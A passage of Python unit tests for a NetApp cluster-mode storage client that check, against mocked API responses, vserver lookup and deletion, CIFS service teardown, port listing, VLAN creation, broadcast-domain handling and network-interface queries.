                     mock.Mock(return_value=api_response))
    result = self.client.get_vserver_ipspace(fake.VSERVER_NAME)
    vserver_get_iter_args = {
        'query': {
            'vserver-info': {
                'vserver-name': fake.VSERVER_NAME,
            },
        },
        'desired-attributes': {
            'vserver-info': {
                'ipspace': None,
            },
        },
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('vserver-get-iter', vserver_get_iter_args)])
    self.assertEqual(fake.IPSPACE_NAME, result)
def test_get_vserver_ipspace_not_supported(self):
    """Without the IPSPACES feature, get_vserver_ipspace returns None."""
    result = self.client.get_vserver_ipspace(fake.IPSPACE_NAME)
    self.assertIsNone(result)
def test_get_vserver_ipspace_not_found(self):
    """An empty ipspace lookup response raises NetAppException."""
    self.client.features.add_feature('IPSPACES')
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    self.assertRaises(exception.NetAppException,
                      self.client.get_vserver_ipspace,
                      fake.IPSPACE_NAME)
def test_ipspace_has_data_vservers(self):
    """ipspace_has_data_vservers queries data vservers in the ipspace."""
    self.client.features.add_feature('IPSPACES')
    api_response = netapp_api.NaElement(fake.VSERVER_GET_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.ipspace_has_data_vservers(fake.IPSPACE_NAME)
    vserver_get_iter_args = {
        'query': {
            'vserver-info': {
                'ipspace': fake.IPSPACE_NAME,
                'vserver-type': 'data'
            },
        },
        'desired-attributes': {
            'vserver-info': {
                'vserver-name': None,
            },
        },
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('vserver-get-iter', vserver_get_iter_args)])
    self.assertTrue(result)
def test_ipspace_has_data_vservers_not_supported(self):
    """Without the IPSPACES feature, the check short-circuits to False."""
    result = self.client.ipspace_has_data_vservers(fake.IPSPACE_NAME)
    self.assertFalse(result)
def test_ipspace_has_data_vservers_not_found(self):
    """An empty response means the ipspace has no data vservers."""
    self.client.features.add_feature('IPSPACES')
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    result = self.client.ipspace_has_data_vservers(fake.IPSPACE_NAME)
    self.assertFalse(result)
def test_list_vservers(self):
    """list_vservers defaults to querying vservers of type 'data'."""
    api_response = netapp_api.NaElement(
        fake.VSERVER_DATA_LIST_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.list_vservers()
    vserver_get_iter_args = {
        'query': {
            'vserver-info': {
                'vserver-type': 'data'
            }
        },
        'desired-attributes': {
            'vserver-info': {
                'vserver-name': None
            }
        }
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('vserver-get-iter', vserver_get_iter_args)])
    self.assertListEqual([fake.VSERVER_NAME], result)
def test_list_vservers_node_type(self):
    """list_vservers honors an explicit vserver_type of 'node'."""
    api_response = netapp_api.NaElement(
        fake.VSERVER_DATA_LIST_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.list_vservers(vserver_type='node')
    vserver_get_iter_args = {
        'query': {
            'vserver-info': {
                'vserver-type': 'node'
            }
        },
        'desired-attributes': {
            'vserver-info': {
                'vserver-name': None
            }
        }
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('vserver-get-iter', vserver_get_iter_args)])
    self.assertListEqual([fake.VSERVER_NAME], result)
def test_list_vservers_not_found(self):
    """list_vservers returns an empty list when no vservers match."""
    empty_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(
        self.client, 'send_request', mock.Mock(return_value=empty_response))
    self.assertListEqual([], self.client.list_vservers(vserver_type='data'))
def test_get_vserver_volume_count(self):
    """get_vserver_volume_count reflects the record count in the response."""
    count_response = netapp_api.NaElement(fake.VOLUME_COUNT_RESPONSE)
    self.mock_object(
        self.client, 'send_iter_request',
        mock.Mock(return_value=count_response))
    self.assertEqual(2, self.client.get_vserver_volume_count())
def test_delete_vserver_no_volumes(self):
    """delete_vserver with zero volumes terminates services and destroys."""
    self.mock_object(self.client,
                     'vserver_exists',
                     mock.Mock(return_value=True))
    self.mock_object(self.client,
                     'get_vserver_root_volume_name',
                     mock.Mock(return_value=fake.ROOT_VOLUME_NAME))
    self.mock_object(self.vserver_client,
                     'get_vserver_volume_count',
                     mock.Mock(return_value=0))
    self.mock_object(self.client, '_terminate_vserver_services')
    self.mock_object(self.client, 'send_request')
    self.client.delete_vserver(
        fake.VSERVER_NAME,
        self.vserver_client,
        security_services=[fake.CIFS_SECURITY_SERVICE])
    self.client._terminate_vserver_services.assert_called_with(
        fake.VSERVER_NAME, self.vserver_client,
        [fake.CIFS_SECURITY_SERVICE])
    vserver_destroy_args = {'vserver-name': fake.VSERVER_NAME}
    self.client.send_request.assert_has_calls([
        mock.call('vserver-destroy', vserver_destroy_args)])
def test_delete_vserver_one_volume(self):
    """With only the root volume present, it is offlined and deleted first."""
    self.mock_object(self.client,
                     'vserver_exists',
                     mock.Mock(return_value=True))
    self.mock_object(self.client,
                     'get_vserver_root_volume_name',
                     mock.Mock(return_value=fake.ROOT_VOLUME_NAME))
    self.mock_object(self.vserver_client,
                     'get_vserver_volume_count',
                     mock.Mock(return_value=1))
    self.mock_object(self.client, 'send_request')
    self.mock_object(self.vserver_client, 'offline_volume')
    self.mock_object(self.vserver_client, 'delete_volume')
    self.client.delete_vserver(fake.VSERVER_NAME,
                               self.vserver_client)
    self.vserver_client.offline_volume.assert_called_with(
        fake.ROOT_VOLUME_NAME)
    self.vserver_client.delete_volume.assert_called_with(
        fake.ROOT_VOLUME_NAME)
    vserver_destroy_args = {'vserver-name': fake.VSERVER_NAME}
    self.client.send_request.assert_has_calls([
        mock.call('vserver-destroy', vserver_destroy_args)])
def test_delete_vserver_one_volume_already_offline(self):
    """An EVOLUMEOFFLINE error during offline is logged and tolerated."""
    self.mock_object(self.client,
                     'vserver_exists',
                     mock.Mock(return_value=True))
    self.mock_object(self.client,
                     'get_vserver_root_volume_name',
                     mock.Mock(return_value=fake.ROOT_VOLUME_NAME))
    self.mock_object(self.vserver_client,
                     'get_vserver_volume_count',
                     mock.Mock(return_value=1))
    self.mock_object(self.client, 'send_request')
    # Simulate the root volume already being offline.
    self.mock_object(self.vserver_client,
                     'offline_volume',
                     self._mock_api_error(code=netapp_api.EVOLUMEOFFLINE))
    self.mock_object(self.vserver_client, 'delete_volume')
    self.client.delete_vserver(fake.VSERVER_NAME,
                               self.vserver_client)
    self.vserver_client.offline_volume.assert_called_with(
        fake.ROOT_VOLUME_NAME)
    self.vserver_client.delete_volume.assert_called_with(
        fake.ROOT_VOLUME_NAME)
    vserver_destroy_args = {'vserver-name': fake.VSERVER_NAME}
    self.client.send_request.assert_has_calls([
        mock.call('vserver-destroy', vserver_destroy_args)])
    self.assertEqual(1, client_cmode.LOG.error.call_count)
def test_delete_vserver_one_volume_api_error(self):
    """Any other API error while offlining the root volume propagates."""
    self.mock_object(self.client,
                     'vserver_exists',
                     mock.Mock(return_value=True))
    self.mock_object(self.client,
                     'get_vserver_root_volume_name',
                     mock.Mock(return_value=fake.ROOT_VOLUME_NAME))
    self.mock_object(self.vserver_client,
                     'get_vserver_volume_count',
                     mock.Mock(return_value=1))
    self.mock_object(self.client, 'send_request')
    self.mock_object(self.vserver_client,
                     'offline_volume',
                     self._mock_api_error())
    self.mock_object(self.vserver_client, 'delete_volume')
    self.assertRaises(netapp_api.NaApiError,
                      self.client.delete_vserver,
                      fake.VSERVER_NAME,
                      self.vserver_client)
def test_delete_vserver_multiple_volumes(self):
    """Deletion is refused when more than the root volume still exists."""
    self.mock_object(self.client,
                     'vserver_exists',
                     mock.Mock(return_value=True))
    self.mock_object(self.client,
                     'get_vserver_root_volume_name',
                     mock.Mock(return_value=fake.ROOT_VOLUME_NAME))
    self.mock_object(self.vserver_client,
                     'get_vserver_volume_count',
                     mock.Mock(return_value=2))
    self.assertRaises(exception.NetAppException,
                      self.client.delete_vserver,
                      fake.VSERVER_NAME,
                      self.vserver_client)
def test_delete_vserver_not_found(self):
    """Deleting a nonexistent vserver is a logged no-op, not an error."""
    self.mock_object(self.client,
                     'vserver_exists',
                     mock.Mock(return_value=False))
    self.client.delete_vserver(fake.VSERVER_NAME,
                               self.vserver_client)
    self.assertEqual(1, client_cmode.LOG.error.call_count)
def test_terminate_vserver_services(self):
    """_terminate_vserver_services deletes the CIFS server with admin creds."""
    self.mock_object(self.vserver_client, 'send_request')
    self.client._terminate_vserver_services(fake.VSERVER_NAME,
                                            self.vserver_client,
                                            [fake.CIFS_SECURITY_SERVICE])
    cifs_server_delete_args = {
        'admin-password': fake.CIFS_SECURITY_SERVICE['password'],
        'admin-username': fake.CIFS_SECURITY_SERVICE['user'],
    }
    self.vserver_client.send_request.assert_has_calls([
        mock.call('cifs-server-delete', cifs_server_delete_args)])
def test_terminate_vserver_services_cifs_not_found(self):
    """A missing CIFS server (EOBJECTNOTFOUND) is logged and tolerated."""
    self.mock_object(self.vserver_client,
                     'send_request',
                     self._mock_api_error(
                         code=netapp_api.EOBJECTNOTFOUND))
    self.client._terminate_vserver_services(fake.VSERVER_NAME,
                                            self.vserver_client,
                                            [fake.CIFS_SECURITY_SERVICE])
    cifs_server_delete_args = {
        'admin-password': fake.CIFS_SECURITY_SERVICE['password'],
        'admin-username': fake.CIFS_SECURITY_SERVICE['user'],
    }
    self.vserver_client.send_request.assert_has_calls([
        mock.call('cifs-server-delete', cifs_server_delete_args)])
    self.assertEqual(1, client_cmode.LOG.error.call_count)
def test_terminate_vserver_services_api_error(self):
    """On other API errors the CIFS delete is retried without credentials."""
    side_effects = [netapp_api.NaApiError(code='fake'), None]
    self.mock_object(self.vserver_client,
                     'send_request',
                     mock.Mock(side_effect=side_effects))
    self.client._terminate_vserver_services(fake.VSERVER_NAME,
                                            self.vserver_client,
                                            [fake.CIFS_SECURITY_SERVICE])
    cifs_server_delete_args = {
        'admin-password': fake.CIFS_SECURITY_SERVICE['password'],
        'admin-username': fake.CIFS_SECURITY_SERVICE['user'],
    }
    # First call with creds fails; the fallback call carries no args.
    self.vserver_client.send_request.assert_has_calls([
        mock.call('cifs-server-delete', cifs_server_delete_args),
        mock.call('cifs-server-delete')])
    self.assertEqual(0, client_cmode.LOG.error.call_count)
def test_list_cluster_nodes(self):
    """list_cluster_nodes returns the node names from the API response."""
    api_response = netapp_api.NaElement(
        fake.SYSTEM_NODE_GET_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    result = self.client.list_cluster_nodes()
    self.assertListEqual([fake.NODE_NAME], result)
def test_list_cluster_nodes_not_found(self):
    """list_cluster_nodes returns an empty list for an empty response."""
    empty_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(
        self.client, 'send_request', mock.Mock(return_value=empty_response))
    self.assertListEqual([], self.client.list_cluster_nodes())
def test_list_node_data_ports(self):
    """list_node_data_ports returns port names in speed-sorted order."""
    self.mock_object(self.client,
                     'get_node_data_ports',
                     mock.Mock(return_value=fake.SPEED_SORTED_PORTS))
    result = self.client.list_node_data_ports(fake.NODE_NAME)
    self.assertSequenceEqual(fake.SPEED_SORTED_PORT_NAMES, result)
def test_get_node_data_ports(self):
    """get_node_data_ports queries up, physical/if_group data ports."""
    api_response = netapp_api.NaElement(fake.NET_PORT_GET_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.get_node_data_ports(fake.NODE_NAME)
    net_port_get_iter_args = {
        'query': {
            'net-port-info': {
                'node': fake.NODE_NAME,
                'link-status': 'up',
                'port-type': 'physical|if_group',
                'role': 'data',
            },
        },
        'desired-attributes': {
            'net-port-info': {
                'port': None,
                'node': None,
                'operational-speed': None,
                'ifgrp-port': None,
            },
        },
    }
    self.assertSequenceEqual(fake.SPEED_SORTED_PORTS, result)
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-port-get-iter', net_port_get_iter_args)])
def test_get_node_data_ports_not_found(self):
    """get_node_data_ports returns an empty sequence for no records."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.get_node_data_ports(fake.NODE_NAME)
    self.assertSequenceEqual([], result)
def test_sort_data_ports_by_speed(self):
    """_sort_data_ports_by_speed orders ports as the fixture expects."""
    ordered = self.client._sort_data_ports_by_speed(
        fake.UNSORTED_PORTS_ALL_SPEEDS)
    self.assertSequenceEqual(fake.SORTED_PORTS_ALL_SPEEDS, ordered)
def test_list_aggregates(self):
    """list_aggregates returns the aggregate names from the response."""
    api_response = netapp_api.NaElement(fake.AGGR_GET_NAMES_RESPONSE)
    self.mock_object(self.client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    result = self.client.list_aggregates()
    self.assertSequenceEqual(fake.SHARE_AGGREGATE_NAMES, result)
def test_list_aggregates_not_found(self):
    """Finding no aggregates raises NetAppException rather than []."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    self.assertRaises(exception.NetAppException,
                      self.client.list_aggregates)
def test_list_vserver_aggregates(self):
    """list_vserver_aggregates returns the keys of the capacity mapping."""
    self.mock_object(self.vserver_client,
                     'get_vserver_aggregate_capacities',
                     mock.Mock(return_value=fake.VSERVER_AGGREGATES))
    result = self.vserver_client.list_vserver_aggregates()
    self.assertListEqual(list(fake.VSERVER_AGGREGATES.keys()), result)
def test_list_vserver_aggregates_none_found(self):
    """An empty capacity mapping yields an empty aggregate list."""
    self.mock_object(
        self.vserver_client, 'get_vserver_aggregate_capacities',
        mock.Mock(return_value={}))
    self.assertListEqual([], self.vserver_client.list_vserver_aggregates())
@ddt.data((True, True), (True, False), (False, True), (False, False))
@ddt.unpack
def test_create_network_interface(self, broadcast_domains_supported,
                                  use_vlans):
    """create_network_interface handles VLAN and broadcast-domain variants.

    Exercises all four combinations of broadcast-domain feature support
    and VLAN use, checking which helpers run and the LIF create args.
    """
    self.client.features.add_feature('BROADCAST_DOMAINS',
                                     broadcast_domains_supported)
    self.mock_object(self.client, '_ensure_broadcast_domain_for_port')
    self.mock_object(self.client, '_create_vlan')
    self.mock_object(self.client, 'send_request')
    lif_create_args = {
        'address': fake.IP_ADDRESS,
        'administrative-status': 'up',
        'data-protocols': [
            {'data-protocol': 'nfs'},
            {'data-protocol': 'cifs'}
        ],
        'home-node': fake.NODE_NAME,
        'home-port': fake.VLAN_PORT if use_vlans else fake.PORT,
        'netmask': fake.NETMASK,
        'interface-name': fake.LIF_NAME,
        'role': 'data',
        'vserver': fake.VSERVER_NAME,
    }
    self.client.create_network_interface(fake.IP_ADDRESS,
                                         fake.NETMASK,
                                         fake.VLAN if use_vlans else None,
                                         fake.NODE_NAME,
                                         fake.PORT,
                                         fake.VSERVER_NAME,
                                         fake.LIF_NAME,
                                         fake.IPSPACE_NAME)
    if use_vlans:
        self.client._create_vlan.assert_called_with(
            fake.NODE_NAME, fake.PORT, fake.VLAN)
    else:
        self.assertFalse(self.client._create_vlan.called)
    if broadcast_domains_supported:
        self.client._ensure_broadcast_domain_for_port.assert_called_with(
            fake.NODE_NAME, fake.VLAN_PORT if use_vlans else fake.PORT,
            ipspace=fake.IPSPACE_NAME)
    else:
        self.assertFalse(
            self.client._ensure_broadcast_domain_for_port.called)
    self.client.send_request.assert_has_calls([
        mock.call('net-interface-create', lif_create_args)])
def test_create_vlan(self):
    """_create_vlan issues net-vlan-create with parent port and VLAN id."""
    self.mock_object(self.client, 'send_request')
    vlan_create_args = {
        'vlan-info': {
            'parent-interface': fake.PORT,
            'node': fake.NODE_NAME,
            'vlanid': fake.VLAN
        }
    }
    self.client._create_vlan(fake.NODE_NAME, fake.PORT, fake.VLAN)
    self.client.send_request.assert_has_calls([
        mock.call('net-vlan-create', vlan_create_args)])
def test_create_vlan_already_present(self):
    """An EDUPLICATEENTRY error from vlan create is logged at debug."""
    self.mock_object(self.client,
                     'send_request',
                     self._mock_api_error(code=netapp_api.EDUPLICATEENTRY))
    vlan_create_args = {
        'vlan-info': {
            'parent-interface': fake.PORT,
            'node': fake.NODE_NAME,
            'vlanid': fake.VLAN
        }
    }
    self.client._create_vlan(fake.NODE_NAME, fake.PORT, fake.VLAN)
    self.client.send_request.assert_has_calls([
        mock.call('net-vlan-create', vlan_create_args)])
    self.assertEqual(1, client_cmode.LOG.debug.call_count)
def test_create_vlan_api_error(self):
    """Other API errors from vlan create surface as NetAppException."""
    self.mock_object(self.client, 'send_request', self._mock_api_error())
    self.assertRaises(exception.NetAppException,
                      self.client._create_vlan,
                      fake.NODE_NAME,
                      fake.PORT,
                      fake.VLAN)
def test_ensure_broadcast_domain_for_port_domain_match(self):
    """No domain changes are made when the port is already in the domain."""
    port_info = {
        'ipspace': fake.IPSPACE_NAME,
        'broadcast-domain': fake.BROADCAST_DOMAIN,
    }
    self.mock_object(self.client,
                     '_get_broadcast_domain_for_port',
                     mock.Mock(return_value=port_info))
    self.mock_object(self.client,
                     '_broadcast_domain_exists',
                     mock.Mock(return_value=True))
    self.mock_object(self.client, '_create_broadcast_domain')
    self.mock_object(self.client, '_add_port_to_broadcast_domain')
    self.client._ensure_broadcast_domain_for_port(
        fake.NODE_NAME, fake.PORT, domain=fake.BROADCAST_DOMAIN,
        ipspace=fake.IPSPACE_NAME)
    self.client._get_broadcast_domain_for_port.assert_has_calls([
        mock.call(fake.NODE_NAME, fake.PORT)])
    self.assertFalse(self.client._broadcast_domain_exists.called)
    self.assertFalse(self.client._create_broadcast_domain.called)
    self.assertFalse(self.client._add_port_to_broadcast_domain.called)
def test_ensure_broadcast_domain_for_port_other_domain(self):
    """A port in a different domain is moved to the requested one."""
    port_info = {
        'ipspace': fake.IPSPACE_NAME,
        'broadcast-domain': 'other_domain',
    }
    self.mock_object(self.client,
                     '_get_broadcast_domain_for_port',
                     mock.Mock(return_value=port_info))
    self.mock_object(self.client,
                     '_broadcast_domain_exists',
                     mock.Mock(return_value=True))
    self.mock_object(self.client, '_create_broadcast_domain')
    self.mock_object(self.client, '_remove_port_from_broadcast_domain')
    self.mock_object(self.client, '_add_port_to_broadcast_domain')
    self.client._ensure_broadcast_domain_for_port(
        fake.NODE_NAME, fake.PORT, domain=fake.BROADCAST_DOMAIN,
        ipspace=fake.IPSPACE_NAME)
    self.client._get_broadcast_domain_for_port.assert_has_calls([
        mock.call(fake.NODE_NAME, fake.PORT)])
    self.client._remove_port_from_broadcast_domain.assert_has_calls([
        mock.call(fake.NODE_NAME, fake.PORT, 'other_domain',
                  fake.IPSPACE_NAME)])
    self.client._broadcast_domain_exists.assert_has_calls([
        mock.call(fake.BROADCAST_DOMAIN, fake.IPSPACE_NAME)])
    # The target domain already exists, so no create is expected.
    self.assertFalse(self.client._create_broadcast_domain.called)
    self.client._add_port_to_broadcast_domain.assert_has_calls([
        mock.call(fake.NODE_NAME, fake.PORT, fake.BROADCAST_DOMAIN,
                  fake.IPSPACE_NAME)])
def test_ensure_broadcast_domain_for_port_no_domain(self):
    """A domainless port triggers domain creation and port addition."""
    port_info = {
        'ipspace': fake.IPSPACE_NAME,
        'broadcast-domain': None,
    }
    self.mock_object(self.client,
                     '_get_broadcast_domain_for_port',
                     mock.Mock(return_value=port_info))
    self.mock_object(self.client,
                     '_broadcast_domain_exists',
                     mock.Mock(return_value=False))
    self.mock_object(self.client, '_create_broadcast_domain')
    self.mock_object(self.client, '_remove_port_from_broadcast_domain')
    self.mock_object(self.client, '_add_port_to_broadcast_domain')
    self.client._ensure_broadcast_domain_for_port(
        fake.NODE_NAME, fake.PORT, domain=fake.BROADCAST_DOMAIN,
        ipspace=fake.IPSPACE_NAME)
    self.client._get_broadcast_domain_for_port.assert_has_calls([
        mock.call(fake.NODE_NAME, fake.PORT)])
    self.assertFalse(self.client._remove_port_from_broadcast_domain.called)
    self.client._broadcast_domain_exists.assert_has_calls([
        mock.call(fake.BROADCAST_DOMAIN, fake.IPSPACE_NAME)])
    self.client._create_broadcast_domain.assert_has_calls([
        mock.call(fake.BROADCAST_DOMAIN, fake.IPSPACE_NAME)])
    self.client._add_port_to_broadcast_domain.assert_has_calls([
        mock.call(fake.NODE_NAME, fake.PORT, fake.BROADCAST_DOMAIN,
                  fake.IPSPACE_NAME)])
def test_get_broadcast_domain_for_port(self):
    """_get_broadcast_domain_for_port returns domain and ipspace info."""
    api_response = netapp_api.NaElement(
        fake.NET_PORT_GET_ITER_BROADCAST_DOMAIN_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    net_port_get_iter_args = {
        'query': {
            'net-port-info': {
                'node': fake.NODE_NAME,
                'port': fake.PORT,
            },
        },
        'desired-attributes': {
            'net-port-info': {
                'broadcast-domain': None,
                'ipspace': None,
            },
        },
    }
    result = self.client._get_broadcast_domain_for_port(fake.NODE_NAME,
                                                        fake.PORT)
    expected = {
        'broadcast-domain': fake.BROADCAST_DOMAIN,
        'ipspace': fake.IPSPACE_NAME,
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-port-get-iter', net_port_get_iter_args)])
    self.assertEqual(expected, result)
def test_get_broadcast_domain_for_port_port_not_found(self):
    """An unknown port raises NetAppException."""
    api_response = netapp_api.NaElement(
        fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    self.assertRaises(exception.NetAppException,
                      self.client._get_broadcast_domain_for_port,
                      fake.NODE_NAME,
                      fake.PORT)
def test_get_broadcast_domain_for_port_domain_not_found(self):
    """A port without a broadcast domain reports None for the domain."""
    api_response = netapp_api.NaElement(
        fake.NET_PORT_GET_ITER_BROADCAST_DOMAIN_MISSING_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client._get_broadcast_domain_for_port(fake.NODE_NAME,
                                                        fake.PORT)
    expected = {
        'broadcast-domain': None,
        'ipspace': fake.IPSPACE_NAME,
    }
    self.assertEqual(expected, result)
def test_broadcast_domain_exists(self):
    """_broadcast_domain_exists queries the domain within its ipspace."""
    api_response = netapp_api.NaElement(
        fake.NET_PORT_BROADCAST_DOMAIN_GET_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client._broadcast_domain_exists(fake.BROADCAST_DOMAIN,
                                                  fake.IPSPACE_NAME)
    net_port_broadcast_domain_get_iter_args = {
        'query': {
            'net-port-broadcast-domain-info': {
                'ipspace': fake.IPSPACE_NAME,
                'broadcast-domain': fake.BROADCAST_DOMAIN,
            },
        },
        'desired-attributes': {
            'net-port-broadcast-domain-info': None,
        },
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-port-broadcast-domain-get-iter',
                  net_port_broadcast_domain_get_iter_args)])
    self.assertTrue(result)
def test_broadcast_domain_exists_not_found(self):
    """_broadcast_domain_exists is False when no records are returned."""
    api_response = netapp_api.NaElement(
        fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    result = self.client._broadcast_domain_exists(fake.BROADCAST_DOMAIN,
                                                  fake.IPSPACE_NAME)
    self.assertFalse(result)
def test_create_broadcast_domain(self):
    """_create_broadcast_domain passes ipspace, domain, and MTU to create."""
    self.mock_object(self.client, 'send_request')
    result = self.client._create_broadcast_domain(fake.BROADCAST_DOMAIN,
                                                  fake.IPSPACE_NAME,
                                                  mtu=fake.MTU)
    net_port_broadcast_domain_create_args = {
        'ipspace': fake.IPSPACE_NAME,
        'broadcast-domain': fake.BROADCAST_DOMAIN,
        'mtu': fake.MTU,
    }
    self.assertIsNone(result)
    self.client.send_request.assert_has_calls([
        mock.call('net-port-broadcast-domain-create',
                  net_port_broadcast_domain_create_args)])
def test_delete_broadcast_domain(self):
    """_delete_broadcast_domain issues a domain destroy in the ipspace."""
    self.mock_object(self.client, 'send_request')
    result = self.client._delete_broadcast_domain(fake.BROADCAST_DOMAIN,
                                                  fake.IPSPACE_NAME)
    net_port_broadcast_domain_delete_args = {
        'ipspace': fake.IPSPACE_NAME,
        'broadcast-domain': fake.BROADCAST_DOMAIN,
    }
    self.assertIsNone(result)
    self.client.send_request.assert_has_calls([
        mock.call('net-port-broadcast-domain-destroy',
                  net_port_broadcast_domain_delete_args)])
def test_delete_broadcast_domains_for_ipspace_not_found(self):
    """No domains are deleted when the ipspace lookup returns nothing."""
    self.mock_object(self.client,
                     'get_ipspaces',
                     mock.Mock(return_value=[]))
    self.mock_object(self.client, '_delete_broadcast_domain')
    self.client._delete_broadcast_domains_for_ipspace(fake.IPSPACE_NAME)
    self.client.get_ipspaces.assert_called_once_with(
        ipspace_name=fake.IPSPACE_NAME)
    self.assertFalse(self.client._delete_broadcast_domain.called)
def test_delete_broadcast_domains_for_ipspace(self):
    """Each broadcast domain reported for the ipspace is deleted."""
    self.mock_object(self.client,
                     'get_ipspaces',
                     mock.Mock(return_value=fake.IPSPACES))
    self.mock_object(self.client, '_delete_broadcast_domain')
    self.client._delete_broadcast_domains_for_ipspace(fake.IPSPACE_NAME)
    self.client.get_ipspaces.assert_called_once_with(
        ipspace_name=fake.IPSPACE_NAME)
    self.client._delete_broadcast_domain.assert_called_once_with(
        fake.IPSPACES[0]['broadcast-domains'][0], fake.IPSPACE_NAME)
def test_add_port_to_broadcast_domain(self):
    """_add_port_to_broadcast_domain adds the node:port qualified name."""
    self.mock_object(self.client, 'send_request')
    add_port_to_broadcast_domain_args = {
        'ipspace': fake.IPSPACE_NAME,
        'broadcast-domain': fake.BROADCAST_DOMAIN,
        'ports': {
            'net-qualified-port-name': ':'.join([fake.NODE_NAME,
                                                 fake.VLAN_PORT])
        }
    }
    result = self.client._add_port_to_broadcast_domain(
        fake.NODE_NAME, fake.VLAN_PORT, fake.BROADCAST_DOMAIN,
        fake.IPSPACE_NAME)
    self.assertIsNone(result)
    self.client.send_request.assert_has_calls([
        mock.call('net-port-broadcast-domain-add-ports',
                  add_port_to_broadcast_domain_args)])
def test_add_port_to_broadcast_domain_already_present(self):
    """An already-assigned port error is tolerated silently."""
    self.mock_object(self.client, 'send_request', self._mock_api_error(
        code=netapp_api.
        E_VIFMGR_PORT_ALREADY_ASSIGNED_TO_BROADCAST_DOMAIN))
    result = self.client._add_port_to_broadcast_domain(
        fake.NODE_NAME, fake.VLAN_PORT, fake.BROADCAST_DOMAIN,
        fake.IPSPACE_NAME)
    self.assertIsNone(result)
def test_add_port_to_broadcast_domain_api_error(self):
    """Other API errors while adding a port raise NetAppException."""
    self.mock_object(self.client, 'send_request', self._mock_api_error())
    self.assertRaises(exception.NetAppException,
                      self.client._add_port_to_broadcast_domain,
                      fake.NODE_NAME,
                      fake.VLAN_PORT,
                      fake.BROADCAST_DOMAIN,
                      fake.IPSPACE_NAME)
def test_remove_port_from_broadcast_domain(self):
    """_remove_port_from_broadcast_domain removes the qualified port."""
    self.mock_object(self.client, 'send_request')
    result = self.client._remove_port_from_broadcast_domain(
        fake.NODE_NAME, fake.VLAN_PORT, fake.BROADCAST_DOMAIN,
        fake.IPSPACE_NAME)
    net_port_broadcast_domain_remove_ports_args = {
        'ipspace': fake.IPSPACE_NAME,
        'broadcast-domain': fake.BROADCAST_DOMAIN,
        'ports': {
            'net-qualified-port-name': ':'.join([fake.NODE_NAME,
                                                 fake.VLAN_PORT])
        }
    }
    self.assertIsNone(result)
    self.client.send_request.assert_has_calls([
        mock.call('net-port-broadcast-domain-remove-ports',
                  net_port_broadcast_domain_remove_ports_args)])
def test_network_interface_exists(self):
    """network_interface_exists matches the VLAN port when a VLAN is set."""
    api_response = netapp_api.NaElement(
        fake.NET_INTERFACE_GET_ONE_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    net_interface_get_args = {
        'query': {
            'net-interface-info': {
                'address': fake.IP_ADDRESS,
                'home-node': fake.NODE_NAME,
                'home-port': fake.VLAN_PORT,
                'netmask': fake.NETMASK,
                'vserver': fake.VSERVER_NAME}
        },
        'desired-attributes': {
            'net-interface-info': {
                'interface-name': None,
            }
        }
    }
    result = self.client.network_interface_exists(
        fake.VSERVER_NAME, fake.NODE_NAME, fake.PORT, fake.IP_ADDRESS,
        fake.NETMASK, fake.VLAN)
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-interface-get-iter', net_interface_get_args)])
    self.assertTrue(result)
def test_network_interface_exists_not_found(self):
    """Without a VLAN, the raw port is queried; no records means False."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    net_interface_get_args = {
        'query': {
            'net-interface-info': {
                'address': fake.IP_ADDRESS,
                'home-node': fake.NODE_NAME,
                'home-port': fake.PORT,
                'netmask': fake.NETMASK,
                'vserver': fake.VSERVER_NAME}
        },
        'desired-attributes': {
            'net-interface-info': {
                'interface-name': None,
            }
        }
    }
    result = self.client.network_interface_exists(
        fake.VSERVER_NAME, fake.NODE_NAME, fake.PORT, fake.IP_ADDRESS,
        fake.NETMASK, None)
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-interface-get-iter', net_interface_get_args)])
    self.assertFalse(result)
def test_list_network_interfaces(self):
    """list_network_interfaces returns all LIF names, names-only query."""
    api_response = netapp_api.NaElement(
        fake.NET_INTERFACE_GET_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
